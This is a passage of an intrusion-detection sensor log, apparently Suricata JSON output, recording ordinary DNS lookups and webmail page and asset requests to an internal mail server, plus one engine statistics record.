{"timestamp":"2020-02-29T00:02:14.000230+0000","flow_id":296510195100328,"event_type":"flow","src_ip":"192.168.10.122","src_port":39865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:13.060072+0000","end":"2020-02-28T23:57:13.168011+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:15.188187+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.196007+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41386,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6808,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:15.307685+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41386,"proto":"UDP","dns":{"type":"answer","id":6808,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:15.307685+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41386,"proto":"UDP","dns":{"type":"answer","id":6808,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:15.380900+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5163}} {"timestamp":"2020-02-29T00:02:15.449100+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5163},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":17869,"tx_id":1}} 
{"timestamp":"2020-02-29T00:02:15.453845+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833}} {"timestamp":"2020-02-29T00:02:15.456055+0000","flow_id":872675782682226,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52658,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867}} {"timestamp":"2020-02-29T00:02:15.457505+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-base.js","state":"CLOSED","stored":false,"size":5941,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.456227+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:02:15.460235+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281}} 
{"timestamp":"2020-02-29T00:02:15.464545+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-dimp.js","state":"CLOSED","stored":false,"size":46315,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.465098+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.465224+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:02:15.466791+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712}} {"timestamp":"2020-02-29T00:02:15.467689+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795}} {"timestamp":"2020-02-29T00:02:15.469165+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imagepoll.js","state":"CLOSED","stored":false,"size":1911,"tx_id":1}} {"timestamp":"2020-02-29T00:02:15.469894+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/editor.js","state":"CLOSED","stored":false,"size":2493,"tx_id":3}} {"timestamp":"2020-02-29T00:02:15.470165+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/draghandler.js","state":"CLOSED","stored":false,"size":2941,"tx_id":1}} 
{"timestamp":"2020-02-29T00:02:15.470467+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} {"timestamp":"2020-02-29T00:02:15.476978+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:02:15.478627+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.513326+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788}} {"timestamp":"2020-02-29T00:02:15.521234+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958}} 
{"timestamp":"2020-02-29T00:02:15.568491+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":9444,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.568785+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480}} {"timestamp":"2020-02-29T00:02:15.571258+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":4}} {"timestamp":"2020-02-29T00:02:15.571729+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253}} {"timestamp":"2020-02-29T00:02:15.573185+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/forward.png","state":"CLOSED","stored":false,"size":253,"tx_id":5}} 
{"timestamp":"2020-02-29T00:02:15.574651+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":3}} {"timestamp":"2020-02-29T00:02:15.574878+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:02:15.617354+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545}} 
{"timestamp":"2020-02-29T00:02:19.398695+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":4}} {"timestamp":"2020-02-29T00:02:19.399076+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124}} 
{"timestamp":"2020-02-29T00:02:20.000204+0000","event_type":"stats","stats":{"uptime":13792,"capture":{"kernel_packets":132471,"kernel_drops":0},"decoder":{"pkts":132561,"bytes":92010943,"invalid":179,"ipv4":131136,"ipv6":8,"ethernet":132561,"raw":0,"null":0,"sll":0,"tcp":126147,"udp":4796,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2668,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2684,"synack":2675,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1715,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2187,"failed_udp":106},"tx":{"http":4458,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2263}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":142595,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:20.465830+0000","flow_id":872675782682226,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52658,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imageupload.js","state":"CLOSED","stored":false,"size":2232,"tx_id":0}} {"timestamp":"2020-02-29T00:02:20.573829+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/drafts.png","state":"CLOSED","stored":false,"size":480,"tx_id":3}} {"timestamp":"2020-02-29T00:02:20.573923+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
